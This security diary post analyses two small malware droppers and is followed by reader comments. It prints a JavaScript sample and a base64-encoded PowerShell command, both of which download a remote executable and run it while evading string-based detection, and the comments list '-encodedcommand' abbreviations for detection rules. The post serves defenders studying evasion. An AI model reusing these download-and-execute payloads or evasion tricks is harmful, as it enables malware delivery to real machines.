Diverting built-in features for the bad
Sometimes you may find very small pieces of malicious code. Yesterday, I caught this very small Javascript sample with only 2 lines of code:
var d=new ActiveXObject(‘Shell.NormandApplication’.replace(‘Normand’, ‘’)); d.ShellExecute(“PowerShell”,”((New-Object System.Net.WebClient).DownloadFile(‘http://[redacted].exe', ‘xwing.pif’);Start-Process ‘xwing.pif’”,””,””,0);
There is no real obfuscation here, just a trick to avoid the detection of the string ‘Shell.Application’ which often searched by automated tools…
Sometimes, there is no need to implement complex code to bypass detection. A good example comes with PowerShell which has the following cool feature: EncodedCommand[1].
Accepts a base-64-encoded string version of a command. Use this parameter to submit commands to Windows PowerShell that require complex quotation marks or curly braces.
Here is a sample that I also detected yesterday (the lines have been truncated for the readability):
poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd \ IAAoAG4ARQB3AC0AbwBiAGoAZQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAG\ kARQBOAHQAKQAuAEQAbwB3AE4ATABvAGEARABGAEkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBh\ AHIAaQBoAGEAbgB0AHQAcgBhAGQAZQByAHMAbgBnAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AUw\ BjAGEAbgBfADIALgBlAHgAZQAdICAALAAgAB0gJABlAG4AdgA6AFQARQBtAFAAXABvAHUAdABwAHUA\ dAAuAGUAeABlAB0gIAApACAAOwAgAGkAbgBWAG8AawBFAC0ARQB4AFAAUgBlAHMAUwBJAG8ATgAgAB\ 0gJABFAE4AdgA6AHQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0g
The decoded Base64 string is:
(nEw-objecT SySTem.Net.WEbCliENt).DowNLoaDFIlE( https://[redacted]/images/Scan_2.exe , $env:TEmP\output.exe ) ; inVokE-ExPResSIoN $ENv:tEMP\output.exe
Nothing fancy, easy to decode but this trick will bypass most of the default security controls. A good idea is to fine tune your regular expressions and filters to catch the "-encodedcommand" string (and ignore the case).
Note that the PE file is downloaded via HTTPS!
[1] https://blogs.msdn.microsoft.com/timid/2014/03/26/powershell-encodedcommand-and-round-trips/
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
Reverse-Engineering Malware: Advanced Code Analysis | Online | Greenwich Mean Time | Oct 28th - Nov 1st 2024 |
Comments
Also worth note:
https://www.trustedsec.com/blog/circumventing-encodedcommand-detection-powershell/
"There are 15 different iterations to shorthand EncodedCommand which defenders will typically attempt to key off on. One of the most unknown ones is “-ec” which is shorthanded for “-encodedcommand”. Shorthand encodedcommand that should be added to detection rules below:
-e
-ec
-en
-enc
-enco
-encod
-encode
-encoded
-encodedc
-encodedco
-encodedcom
-encodedcomm
-encodedcomma
-encodedcomman
-encodedcommand
"
Anonymous
Mar 30th 2017
7 years ago
Anonymous
Mar 30th 2017
7 years ago
Did you mean to redact the domain in the base64? I figure I am not the only one that decoded it...
Anonymous
Mar 31st 2017
7 years ago
Anonymous
Mar 31st 2017
7 years ago